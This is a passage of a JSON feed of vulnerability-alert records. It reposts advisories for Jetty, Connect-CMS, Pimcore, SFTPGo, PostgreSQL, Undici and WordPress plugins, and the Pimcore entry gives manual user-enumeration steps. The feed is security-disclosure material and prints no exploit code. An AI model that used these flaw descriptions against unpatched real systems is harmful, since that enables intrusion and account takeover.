an idle timeout occurs the HTTP/2 session is marked as closed, and then a GOAWAY frame is queued to be written.\nHowever it is not written because the connection is TCP congested.\nWhen another idle timeout period elapses, it is then supposed to hard close the connection, but it delegates to the HTTP/2 session which reports that it has already been closed so it does not attempt to hard close the connection.\n\nThis leaves the connection in ESTABLISHED state (i.e. not closed), TCP congested, and idle.\n\nAn attacker can cause many connections to end up in this state, and the server may run out of file descriptors, eventually causing the server to stop accepting new connections from valid clients.\n\nThe client may also be impacted (if the server does not read causing a TCP congestion), but the issue is more severe for servers.\n\n### Patches\nPatched versions:\n* 9.4.54\n* 10.0.20\n* 11.0.20\n* 12.0.6\n\n### Workarounds\nDisable HTTP/2 and HTTP/3 support until you can upgrade to a patched version of Jetty.\nHTTP/1.x is not affected.\n\n### References\n* https://github.com/jetty/jetty.project/issues/11256.\n\ud83d\udccf Published: 2024-02-26T20:13:46Z\n\ud83d\udccf Modified: 2025-02-07T20:44:34Z\n\ud83d\udd17 References:\n1. https://github.com/jetty/jetty.project/security/advisories/GHSA-rggv-cv7r-mw98\n2. https://nvd.nist.gov/vuln/detail/CVE-2024-22201\n3. https://github.com/jetty/jetty.project/issues/11256\n4. https://github.com/jetty/jetty.project/issues/11259\n5. https://github.com/jetty/jetty.project/commit/0839a208cdc3fcfe25206a77af59ba9fda260188\n6. https://github.com/jetty/jetty.project/commit/b953871c9a5ff4fbca4a2499848f75182dbd9810\n7. https://github.com/jetty/jetty.project\n8. https://lists.debian.org/debian-lts-announce/2024/04/msg00002.html\n9. https://security.netapp.com/advisory/ntap-20240329-0001\n10. http://www.openwall.com/lists/oss-security/2024/03/20/2", "creation_timestamp": "2025-02-07T21:03:04.000000Z"}, {"uuid": "6765b8ea-6ae2-457a-99c3-10b324688ca0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5RJC-JC28-CWGG", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3830", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-5rjc-jc28-cwgg\n\ud83d\udd25 CVSS Score: 4.2 (CVSS_V3)\n\ud83d\udd39 Description: ### Impact\uff08\u5f71\u97ff\uff09\n\nThere is an Access control vulnerability on the management system of Connect-CMS.\nAffected Version : Connect-CMS v1.8.6, 2.4.6 and earlier\n\n### Patches\uff08\u4fee\u6b63\u30d0\u30fc\u30b8\u30e7\u30f3\uff09\n\nversion v1.8.7, v2.4.7\n\n### Workarounds\uff08\u904b\u7528\u56de\u907f\u624b\u6bb5\uff09\n\nUpgrade Connect-CMS to latest version\n\ud83d\udccf Published: 2025-02-07T20:47:46Z\n\ud83d\udccf Modified: 2025-02-07T20:47:46Z\n\ud83d\udd17 References:\n1. https://github.com/opensource-workshop/connect-cms/security/advisories/GHSA-5rjc-jc28-cwgg\n2. https://github.com/opensource-workshop/connect-cms", "creation_timestamp": "2025-02-07T21:03:02.000000Z"}, {"uuid": "20ab7ac5-532e-429e-acb3-8c6ee8606189", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2237-5R9W-VM8J", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3829", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-2237-5r9w-vm8j\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: ### Impact\n - Information that is restricted from viewing in the search results of site searches (\u203b) can still be viewed via the main text (a feature added in v1.8.0).\n     - Impact by version\n         - v1.8.0 ~ v1.8.3: It will be displayed in the text.\n         - v1.8.0 and earlier: It will not be displayed in the body of the text, but the title (frame name) will be displayed with a link.\n     - Target viewing restriction function\n         - Frame publishing function (private, limited publishing)\n         - IP Restriction Page\n         - Password setting page\n\n### Patches (fixed version)\n - Apply v1.8.4.\n\n### Workarounds\n - Remove the site search (e.g. hide frames).\u3002\n\n### References\nnone\n\ud83d\udccf Published: 2025-02-07T20:50:20Z\n\ud83d\udccf Modified: 2025-02-07T20:50:20Z\n\ud83d\udd17 References:\n1. https://github.com/opensource-workshop/connect-cms/security/advisories/GHSA-2237-5r9w-vm8j\n2. https://github.com/opensource-workshop/connect-cms", "creation_timestamp": "2025-02-07T21:03:02.000000Z"}, {"uuid": "8a3675d9-4bbd-46ce-861d-0de6718f6d86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VR5F-PHP7-RG24", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3835", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24980\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: Description\nSummary\n\nPimcore Admin Classic Bundle allows attackers to enumerate valid accounts because the Forgot password functionality uses different messages when the account is valid vs not.\n\nDetails\n-&gt; error message discloses existing accounts and leads to user enumeration on the target via \"Forgot password\" function. since no generic error message is being implemented.\n\nPoC\n![image](https://github.com/user-attachments/assets/866e4cd1-25b2-4ed8-8292-6c528ae660d5)\n\n\nEnter first a valid account email address and click on submit\n![image](https://github.com/user-attachments/assets/7aaa1723-b0f9-4a76-b943-e1b01d1f37a9)\n\n\nA green message validating the account exists is shown and a login link is sent to the email\n![image](https://github.com/user-attachments/assets/7adb1f05-7339-4265-95c9-4d4817d4a6a1)\n\n\nnow go back and use a random email from temp-mail to test with a non existant account\n![image](https://github.com/user-attachments/assets/5ce0bb53-16c3-4f34-9541-9e01b49c7472)\n\n\n![image](https://github.com/user-attachments/assets/213e838f-0944-484e-93bf-7468ed9e699d)\n\n\nclick on submit and get an error in red that a problem occured\n![image](https://github.com/user-attachments/assets/c30dc56f-e612-46a0-945d-e9dc5f14da39)\n\n\nImpact\nuser enumeration is a confidentiality threat , that could potentially lead to an attacker to enumerate valid accounts and maybe taking over accounts in case combined with credential stuffing on an organisation .\n\nA remedition would be to change the error message in both cases ( valid and invalid emails ) to what we call a \"synchronised error \" it would be for example : \" if the given email address is linked to an account , then a login link would be sent to that email \" or something along those lines\n\ud83d\udccf Published: 2025-02-07T20:27:43Z\n\ud83d\udccf Modified: 2025-02-07T21:38:34Z\n\ud83d\udd17 References:\n1. https://github.com/pimcore/admin-ui-classic-bundle/security/advisories/GHSA-vr5f-php7-rg24\n2. https://nvd.nist.gov/vuln/detail/CVE-2025-24980\n3. https://github.com/pimcore/admin-ui-classic-bundle/pull/808\n4. https://github.com/pimcore/admin-ui-classic-bundle/commit/96ae555578c3b4df368092d71e07a6c4ddf8fbe9\n5. https://github.com/pimcore/admin-ui-classic-bundle", "creation_timestamp": "2025-02-07T22:02:52.000000Z"}, {"uuid": "0d758edf-5bdc-4b6c-870d-bc5ca2d177c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VJ7W-3M8C-6VPX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3834", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-vj7w-3m8c-6vpx\n\ud83d\udd25 CVSS Score: 7.5 (CVSS_V3)\n\ud83d\udd39 Description: ### Impact\nSFTPGo supports execution of a defined set of commands via SSH. Besides a set of default commands some optional commands can be activated, one of them being `rsync`: it is disabled in the default configuration and it is limited to the local filesystem, it does not work with cloud/remote storage backends.\n\nDue to missing sanitization of the client provided `rsync` command, an authenticated remote user can use some options of the rsync command to read or write files with the permissions of the SFTPGo server process. \n\n### Patches\nThis issue was fixed in version v2.6.5 by checking the client provided arguments.\n\nhttps://github.com/drakkan/sftpgo/commit/b347ab6051f6c501da205c09315fe99cd1fa3ba1\n\ud83d\udccf Published: 2025-02-07T20:31:22Z\n\ud83d\udccf Modified: 2025-02-07T20:31:22Z\n\ud83d\udd17 References:\n1. https://github.com/drakkan/sftpgo/security/advisories/GHSA-vj7w-3m8c-6vpx\n2. https://github.com/drakkan/sftpgo/commit/b347ab6051f6c501da205c09315fe99cd1fa3ba1\n3. https://github.com/drakkan/sftpgo", "creation_timestamp": "2025-02-07T21:03:10.000000Z"}, {"uuid": "372b7348-5fe6-4716-bfb2-8a83c1db96e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C33J-W5W4-W9Q4", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3167", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-c33j-w5w4-w9q4\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: The Dyn Business Panel WordPress plugin through 1.0.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n\ud83d\udccf Published: 2025-01-27T06:30:26Z\n\ud83d\udccf Modified: 2025-01-27T06:30:26Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-13055\n2. https://wpscan.com/vulnerability/91178272-ed7e-412c-a187-e360a1313004", "creation_timestamp": "2025-01-27T07:07:56.000000Z"}, {"uuid": "087eca3a-1af3-4615-8f5f-1d9bf3256730", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7JQ5-8RMW-J9WH", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3170", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-7jq5-8rmw-j9wh\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: The WP Triggers Lite WordPress plugin through 2.5.3 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks\n\ud83d\udccf Published: 2025-01-27T06:30:26Z\n\ud83d\udccf Modified: 2025-01-27T06:30:26Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-13095\n2. https://wpscan.com/vulnerability/74e95fb5-025b-4d4d-a279-844b6ee3e57d", "creation_timestamp": "2025-01-27T07:08:01.000000Z"}, {"uuid": "31db7885-fe2b-4834-ad33-190b55ae60ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MRQP-Q7VX-V2CX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4277", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26511\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: No description available\n\ud83d\udccf Published: 2025-02-13T16:16:50.270\n\ud83d\udccf Modified: N/A\n\ud83d\udd17 References:\n1. https://github.com/instaclustr/cassandra-lucene-index/security/advisories/GHSA-mrqp-q7vx-v2cx", "creation_timestamp": "2025-02-13T17:12:16.000000Z"}, {"uuid": "92b599cb-55de-4bb4-82cc-572f1a54076d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2MHX-5998-46HX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4294", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24958\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: No description available\n\ud83d\udccf Published: 2025-02-03T22:15:29.210\n\ud83d\udccf Modified: N/A\n\ud83d\udd17 References:\n1. https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-2mhx-5998-46hx", "creation_timestamp": "2025-02-13T19:09:42.000000Z"}, {"uuid": "561940b0-bf98-4f44-8c51-c9ff4105def3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6C3P-CHQ6-Q3J2", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4298", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24888\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: No description available\n\ud83d\udccf Published: 2025-02-13T18:18:23.047\n\ud83d\udccf Modified: N/A\n\ud83d\udd17 References:\n1. https://github.com/freedomofpress/securedrop-client/blob/0.14.0/client/securedrop_client/utils.py#L79\n2. https://github.com/freedomofpress/securedrop-client/blob/main/client/securedrop_client/api_jobs/downloads.py#L164\n3. https://github.com/freedomofpress/securedrop-client/blob/release/0.14.0/client/securedrop_client/sdk/__init__.py#L956-L957\n4. https://github.com/freedomofpress/securedrop-client/commit/120bac14649db0bcf5f24f2eb82731c76843b1ba\n5. https://github.com/freedomofpress/securedrop-client/security/advisories/GHSA-6c3p-chq6-q3j2\n6. https://www.qubes-os.org/doc/split-gpg", "creation_timestamp": "2025-02-13T19:10:19.000000Z"}, {"uuid": "2e31501a-d497-4f92-beb9-125b7ff72bf5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MHW9-X46C-V6Q4", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/4612", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-mhw9-x46c-v6q4\n\ud83d\udd25 CVSS Score: 8.1 (CVSS_V3)\n\ud83d\udd39 Description: Improper neutralization of quoting syntax in PostgreSQL libpq functions PQescapeLiteral(), PQescapeIdentifier(), PQescapeString(), and PQescapeStringConn() allows a database input provider to achieve SQL injection in certain usage patterns.  Specifically, SQL injection requires the application to use the function result to construct input to psql, the PostgreSQL interactive terminal.  Similarly, improper neutralization of quoting syntax in PostgreSQL command line utility programs allows a source of command line arguments to achieve SQL injection when client_encoding is BIG5 and server_encoding is one of EUC_TW or MULE_INTERNAL.  Versions before PostgreSQL 17.3, 16.7, 15.11, 14.16, and 13.19 are affected.\n\ud83d\udccf Published: 2025-02-13T15:31:25Z\n\ud83d\udccf Modified: 2025-02-16T21:31:43Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-1094\n2. https://lists.debian.org/debian-lts-announce/2025/02/msg00015.html\n3. https://www.postgresql.org/support/security/CVE-2025-1094\n4. http://www.openwall.com/lists/oss-security/2025/02/16/3", "creation_timestamp": "2025-02-17T00:19:06.000000Z"}, {"uuid": "9b8beafc-dd93-4244-ac2b-0c807ebefa84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J588-583P-8QWM", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/4618", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-j588-583p-8qwm\n\ud83d\udd25 CVSS Score: 3.5 (CVSS_V3)\n\ud83d\udd39 Description: A vulnerability, which was classified as problematic, was found in Internet Web Solutions Sublime CRM up to 20250207. Affected is an unknown function of the file /crm/inicio.php of the component HTTP POST Request Handler. The manipulation of the argument msg_to leads to cross site scripting. It is possible to launch the attack remotely. Other parameters might be affected as well. The vendor was contacted early about this disclosure but did not respond in any way.\n\ud83d\udccf Published: 2025-02-16T21:31:43Z\n\ud83d\udccf Modified: 2025-02-16T21:31:43Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-1360\n2. https://vuldb.com/?ctiid.295968\n3. https://vuldb.com/?id.295968\n4. https://vuldb.com/?submit.496469", "creation_timestamp": "2025-02-17T00:20:13.000000Z"}, {"uuid": "c510de63-a78e-4211-a54c-bf2359a9082e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P44G-M5W8-GWHM", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/4626", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-p44g-m5w8-gwhm\n\ud83d\udd25 CVSS Score: 4.2 (CVSS_V3)\n\ud83d\udd39 Description: A vulnerability classified as problematic was found in Pix Software Vivaz 6.0.10. This vulnerability affects unknown code. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.\n\ud83d\udccf Published: 2025-02-16T21:31:43Z\n\ud83d\udccf Modified: 2025-02-16T21:31:43Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-1358\n2. https://vuldb.com/?ctiid.295966\n3. https://vuldb.com/?id.295966\n4. https://vuldb.com/?submit.496141", "creation_timestamp": "2025-02-17T00:22:13.000000Z"}, {"uuid": "1f9207d9-6784-4a20-afc4-71d53c456f79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7G7F-62CF-Q66H", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/4630", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-7g7f-62cf-q66h\n\ud83d\udd25 CVSS Score: 4.2 (CVSS_V3)\n\ud83d\udd39 Description: A vulnerability, which was classified as problematic, has been found in SIAM Industria de Automa\u00e7\u00e3o e Monitoramento SIAM 2.0. This issue affects some unknown processing of the file /qrcode.jsp. The manipulation of the argument url leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.\n\ud83d\udccf Published: 2025-02-16T21:31:43Z\n\ud83d\udccf Modified: 2025-02-16T21:31:43Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-1359\n2. https://vuldb.com/?ctiid.295967\n3. https://vuldb.com/?id.295967\n4. https://vuldb.com/?submit.496171", "creation_timestamp": "2025-02-17T00:22:16.000000Z"}, {"uuid": "371def5f-c7cc-43b3-829d-e7e44c55143d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-933Q-FX9H-5G46", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4297", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24889\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: No description available\n\ud83d\udccf Published: 2025-02-13T18:18:23.240\n\ud83d\udccf Modified: N/A\n\ud83d\udd17 References:\n1. https://github.com/freedomofpress/securedrop-client/commit/3012bf7289389b5ec0f5f4db0f009a17dee1f586\n2. https://github.com/freedomofpress/securedrop-client/security/advisories/GHSA-933q-fx9h-5g46", "creation_timestamp": "2025-02-13T19:10:04.000000Z"}, {"uuid": "42f5556c-916c-4956-81fc-6f6444e0e320", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3787-6PRV-H9W3", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/4319", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-30260\n\ud83d\udd25 CVSS Score: 3.9 (CVSS_V3)\n\ud83d\udd39 Description: ### Impact\n\nUndici cleared Authorization and Proxy-Authorization headers for `fetch()`, but did not clear them for `undici.request()`.\n\n### Patches\n\nThis has been patched in https://github.com/nodejs/undici/commit/6805746680d27a5369d7fb67bc05f95a28247d75.\nFixes has been released in v5.28.4 and v6.11.1.\n\n### Workarounds\n\nuse `fetch()` or disable `maxRedirections`.\n\n### References\n\nLinzi Shang reported this.\n\n* https://hackerone.com/reports/2408074\n* https://github.com/nodejs/undici/security/advisories/GHSA-3787-6prv-h9w3\n\ud83d\udccf Published: 2024-04-04T14:20:39Z\n\ud83d\udccf Modified: 2025-02-13T19:02:14Z\n\ud83d\udd17 References:\n1. https://github.com/nodejs/undici/security/advisories/GHSA-m4v8-wqvr-p9f7\n2. https://nvd.nist.gov/vuln/detail/CVE-2024-30260\n3. https://github.com/nodejs/undici/commit/64e3402da4e032e68de46acb52800c9a06aaea3f\n4. https://github.com/nodejs/undici/commit/6805746680d27a5369d7fb67bc05f95a28247d75\n5. https://hackerone.com/reports/2408074\n6. https://github.com/nodejs/undici\n7. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HQVHWAS6WDXXIU7F72XI55VZ2LTZUB33\n8. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NC3V3HFZ5MOJRZDY5ZELL6REIRSPFROJ\n9. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/P6Q4RGETHVYVHDIQGTJGU5AV6NJEI67E", "creation_timestamp": "2025-02-13T19:18:22.000000Z"}, {"uuid": "58000e66-5dc8-46ca-b35d-478181fb19ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-FR5H-RQP8-MJ6G", "type": "seen", "source": "https://t.me/securixy_kz/882", "content": "", "creation_timestamp": "2026-07-13T00:00:35.635135Z"}, {"uuid": "c37c4cce-72d5-4e4f-ba24-253169cb69f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M4V8-WQVR-P9F7", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/4319", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-30260\n\ud83d\udd25 CVSS Score: 3.9 (CVSS_V3)\n\ud83d\udd39 Description: ### Impact\n\nUndici cleared Authorization and Proxy-Authorization headers for `fetch()`, but did not clear them for `undici.request()`.\n\n### Patches\n\nThis has been patched in https://github.com/nodejs/undici/commit/6805746680d27a5369d7fb67bc05f95a28247d75.\nFixes has been released in v5.28.4 and v6.11.1.\n\n### Workarounds\n\nuse `fetch()` or disable `maxRedirections`.\n\n### References\n\nLinzi Shang reported this.\n\n* https://hackerone.com/reports/2408074\n* https://github.com/nodejs/undici/security/advisories/GHSA-3787-6prv-h9w3\n\ud83d\udccf Published: 2024-04-04T14:20:39Z\n\ud83d\udccf Modified: 2025-02-13T19:02:14Z\n\ud83d\udd17 References:\n1. https://github.com/nodejs/undici/security/advisories/GHSA-m4v8-wqvr-p9f7\n2. https://nvd.nist.gov/vuln/detail/CVE-2024-30260\n3. https://github.com/nodejs/undici/commit/64e3402da4e032e68de46acb52800c9a06aaea3f\n4. https://github.com/nodejs/undici/commit/6805746680d27a5369d7fb67bc05f95a28247d75\n5. https://hackerone.com/reports/2408074\n6. https://github.com/nodejs/undici\n7. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HQVHWAS6WDXXIU7F72XI55VZ2LTZUB33\n8. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NC3V3HFZ5MOJRZDY5ZELL6REIRSPFROJ\n9. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/P6Q4RGETHVYVHDIQGTJGU5AV6NJEI67E", "creation_timestamp": "2025-02-13T19:18:22.000000Z"}, {"uuid": "8b75eb21-6889-4018-beec-27362da232f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P44G-M5W8-GWHM", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/4616", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-p44g-m5w8-gwhm\n\ud83d\udd25 CVSS Score: 4.2 (CVSS_V3)\n\ud83d\udd39 Description: A vulnerability classified as problematic was found in Pix Software Vivaz 6.0.10. This vulnerability affects unknown code. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.\n\ud83d\udccf Published: 2025-02-16T21:31:43Z\n\ud83d\udccf Modified: 2025-02-16T21:31:43Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-1358\n2. https://vuldb.com/?ctiid.295966\n3. https://vuldb.com/?id.295966\n4. https://vuldb.com/?submit.496141", "creation_timestamp": "2025-02-17T00:20:11.000000Z"}, {"uuid": "61e7ab9b-6dda-464f-ae58-beece1619694", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7G7F-62CF-Q66H", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/4620", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-7g7f-62cf-q66h\n\ud83d\udd25 CVSS Score: 4.2 (CVSS_V3)\n\ud83d\udd39 Description: A vulnerability, which was classified as problematic, has been found in SIAM Industria de Automa\u00e7\u00e3o e Monitoramento SIAM 2.0. This issue affects some unknown processing of the file /qrcode.jsp. The manipulation of the argument url leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.\n\ud83d\udccf Published: 2025-02-16T21:31:43Z\n\ud83d\udccf Modified: 2025-02-16T21:31:43Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-1359\n2. https://vuldb.com/?ctiid.295967\n3. https://vuldb.com/?id.295967\n4. https://vuldb.com/?submit.496171", "creation_timestamp": "2025-02-17T00:20:14.000000Z"}, {"uuid": "1404270a-5ca4-4ec1-8d8a-13ab700e02a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MHW9-X46C-V6Q4", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/4622", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-mhw9-x46c-v6q4\n\ud83d\udd25 CVSS Score: 8.1 (CVSS_V3)\n\ud83d\udd39 Description: Improper neutralization of quoting syntax in PostgreSQL libpq functions PQescapeLiteral(), PQescapeIdentifier(), PQescapeString(), and PQescapeStringConn() allows a database input provider to achieve SQL injection in certain usage patterns.  Specifically, SQL injection requires the application to use the function result to construct input to psql, the PostgreSQL interactive terminal.  Similarly, improper neutralization of quoting syntax in PostgreSQL command line utility programs allows a source of command line arguments to achieve SQL injection when client_encoding is BIG5 and server_encoding is one of EUC_TW or MULE_INTERNAL.  Versions before PostgreSQL 17.3, 16.7, 15.11, 14.16, and 13.19 are affected.\n\ud83d\udccf Published: 2025-02-13T15:31:25Z\n\ud83d\udccf Modified: 2025-02-16T21:31:43Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-1094\n2. https://lists.debian.org/debian-lts-announce/2025/02/msg00015.html\n3. https://www.postgresql.org/support/security/CVE-2025-1094\n4. http://www.openwall.com/lists/oss-security/2025/02/16/3", "creation_timestamp": "2025-02-17T00:21:08.000000Z"}, {"uuid": "0276289f-90ac-44c8-8424-7b98c4da1005", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7G7F-62CF-Q66H", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/4625", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-7g7f-62cf-q66h\n\ud83d\udd25 CVSS Score: 4.2 (CVSS_V3)\n\ud83d\udd39 Description: A vulnerability, which was classified as problematic, has been found in SIAM Industria de Automa\u00e7\u00e3o e Monitoramento SIAM 2.0. This issue affects some unknown processing of the file /qrcode.jsp. The manipulation of the argument url leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.\n\ud83d\udccf Published: 2025-02-16T21:31:43Z\n\ud83d\udccf Modified: 2025-02-16T21:31:43Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-1359\n2. https://vuldb.com/?ctiid.295967\n3. https://vuldb.com/?id.295967\n4. https://vuldb.com/?submit.496171", "creation_timestamp": "2025-02-17T00:21:11.000000Z"}, {"uuid": "0f2bac68-e5cf-4a05-aa30-0dab7f918697", "vulnerability_lookup_origin": 